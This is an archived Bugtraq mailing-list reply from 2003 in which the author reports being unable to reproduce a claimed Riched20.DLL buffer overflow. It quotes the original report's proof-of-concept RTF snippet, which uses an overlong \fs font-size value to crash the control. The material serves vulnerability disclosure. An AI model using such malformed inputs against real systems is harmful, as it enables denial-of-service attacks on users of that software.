Re: Riched20.DLL attribute label buffer overflow vulnerability

From: 3APA3A (3APA3Aat_private)
Date: Tue Feb 18 2003 - 00:36:59 PST

Next message: Daniel Ahlberg: "GLSA: nethack"

Previous message: dwheelerat_private: "Presentation on Writing Secure Programs for Linux and Unix in Maryland"
Maybe in reply to: Jie Dong: "Riched20.DLL attribute label buffer overflow vulnerability"
Next in thread: Thor Larholm: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Dear Jie Dong,

Can't reproduce it on riched20.dll v.3.0 (5.30.23.1200) under NT.

--Sunday, February 16, 2003, 4:30:50 PM, you wrote to bugtraqat_private:


JD>    The   following   RTFfile  may  result  in  illegal  operation  :
JD> {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
JD> \fnil\fprq2\fcharset134        \'cb\'ce\'cc\'e5;}}        {\colortbl
JD> ;\red255\green0\blue255;}        \viewkind4\uc1\pard\cf1\kerning2\f0
JD> \fs18121111111111111111111111111111111110000
JD> www.yoursft.com\fs20\par  }  "\fs"  was used for setting the size of


-- 
~/ZARAZA
Человек это тайна... я занимаюсь этой тайной чтобы быть человеком. (Достоевский)

Next message: Daniel Ahlberg: "GLSA: nethack"
Previous message: dwheelerat_private: "Presentation on Writing Secure Programs for Linux and Unix in Maryland"
Maybe in reply to: Jie Dong: "Riched20.DLL attribute label buffer overflow vulnerability"
Next in thread: Thor Larholm: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Feb 18 2003 - 08:12:56 PST